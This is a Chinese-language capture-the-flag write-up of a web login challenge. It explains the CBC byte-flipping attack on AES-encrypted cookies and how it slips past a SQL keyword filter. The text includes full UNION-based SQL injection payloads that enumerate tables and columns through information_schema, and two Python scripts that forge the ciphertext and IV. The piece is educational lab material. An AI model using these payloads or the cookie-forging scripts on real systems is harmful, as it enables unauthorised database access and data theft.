sql 注入、CBC字节翻转攻击

---

简单的登录题

题目地址

思路复现

访问地址，是一个简单的表单，尝试提交数据，一般情况返回Hello！ 当提交union、,等数据，返回 sql inject detected!。例行查看源代码，并没有特殊的东西。但发现http response的header里有test.php字样，访问该地址发现后端php代码。审计后可知满足以下条件时会执行一条sql查询语句，并输出部分查询结果。

• id变量未定义
• 已定义iv、cipher两个cookie变量且可以被反序列化
• sql语句查询结果不为空

初步思路：提交id获得cipher、iv，然后bp构造请求，在header中设置cookie（iv、cipher）且不提交id变量，后端会对cookie解密得到id，然后拼接sql语句执行sql查询。源码中sql语句如下：

select * from users limit ".$info['id'].",0

由于limit id,0 此语句查询结果总为空，所以必须注释掉id后的内容。初步测试时已知web application会过滤某些sql语句关键词。源码体现如下：

preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)

sql语句常见注释符号 #、--已被过滤，这里可以00截断(%00)，提交id=1;%00得到cookie，再单独提交cookie，返回Hello！rootzz。截断成功。尝试提交rootzz，发现并不是flag。但是，这里我们可以发现sql语句关键词只在提交id时过滤，对于cookie解密出的id并不会过滤，后面注入都依据这一特性。结合AES-128-cbc加密算法的漏洞（CBC字节翻转攻击）可以绕过过滤。

关于算法漏洞详情后文予以解释，这里先讨论sql注入语句的构造。由于web application会输出数据库中查询到的内容，这里可以使用union联合查询，由于联合查询前后两句查询列数必须相同，可以使用union select 1,2、union select 1,2,3这样的语句来测试列数和最后输出的是哪一列。但union、,已被过滤，可以用前面提到的翻转攻击绕过。,还存在其他的等价形式，以union select 1,2,3为例，它还可以写成union select * from(select(1)a join select(2)b join select(3)c)。然后可以通过information_schema库查出库名、表名、字段名（等号=用regexp替代），最后得到flag。
完整注入语句如下：

0 union select * from(select(1)a join select(2)b join select(3)c);%00 //查列数、显位
0 union select * from(select(1)a join select(select group_concat(table_name)from information_schema.tables where table_schema regexp database())b join select(3)c);%00 //查表名
0 union select * from(select(1)a join select(select group_concat(column_name)from information_schema.columns where table_name regexp 'you_want')b join select(3)c);%00 //查列名
0 union select * from(select(1)a join select(select * from you_want)b join select(3)c);%00 //得flag

查表名是遇到数据库报错，百度因为内存不够。用mid()或substr()截前20个字符，然后查出表名。字段名由于未知原因未查出，但用*或value可以查出字段值即flag。

CBC字节翻转攻击

AES-128-cbc加密算法

准备工作：首先生成一个16字节的随机值iv和一个密钥，将明文以每组16字节为大小分组，不够16字节用0x00补齐。

• 加密流程
  1.将第一组明文与iv异或
  2.将1所得结果与密钥加密得密文
  3.将2所得密文与第二组明文异或
  4.将3所的结果与密钥加密得密文
  5.重复操作到最后一组明文
  6.将iv和所有密文拼接在一起，得到最终密文
• 解密流程
  把加密流程反过来即可

漏洞分析

异或运算的基本性质
若A^B=C 则A^C=B、B^C=A
A^A=0、0^A=A

以下用12翻转为1#为例说明：
将id=12转化为数组再序列化，然后分组得
 a:1:{s:2:"id";s:
 2:"12"}
约定以{代表{的密文，pl代替第二组字符串解密后的值
 2=pl^{  -->  #=2^2^#=pl^{^2^#
由以上得将密文第一组与2对应的一个字符异或2再异或#，得到new_cipher，解密后12就变成了1#。密文改变后任用旧的iv解密，第一组明文也发生了变化，无法反序列化，所以必须得到新的iv。

有：new_iv^new_cipher=right_plain
  old_iv^new_cipher=error_plain //变量均为解密后的值

若：new_iv=old_iv^error_plain^right_plain 解密后即可正确的被反序列化

下面给出脚本：
new_cipher

import base64,urllib.parse

old_ci=input('old_ci:')
old_ci=base64.b64decode(urllib.parse.unquote(old_ci))
old_ci=list(old_ci)
old_ci[6]=(ord('2')^ord("u")^old_ci[6])
new_ci=bytes(old_ci)
new_ci=urllib.parse.quote(base64.b64encode(new_ci))
print (new_ci)

new_iv

import base64,urllib.parse

old_iv=input('old_iv:')
right_pl='a:1:{s:2:"id";s:'
error_pl=input('error_pl:')
old_iv=base64.b64decode(urllib.parse.unquote(old_iv))
error_pl=base64.b64decode(urllib.parse.unquote(error_pl))
print(error_pl)
new_iv=list(old_iv)
for i in range(0,16):
    new_iv[i]=old_iv[i]^error_pl[i]^ord(right_pl[i])
new_iv=bytes(new_iv)
new_iv=urllib.parse.quote(base64.b64encode(new_iv))
print (new_iv)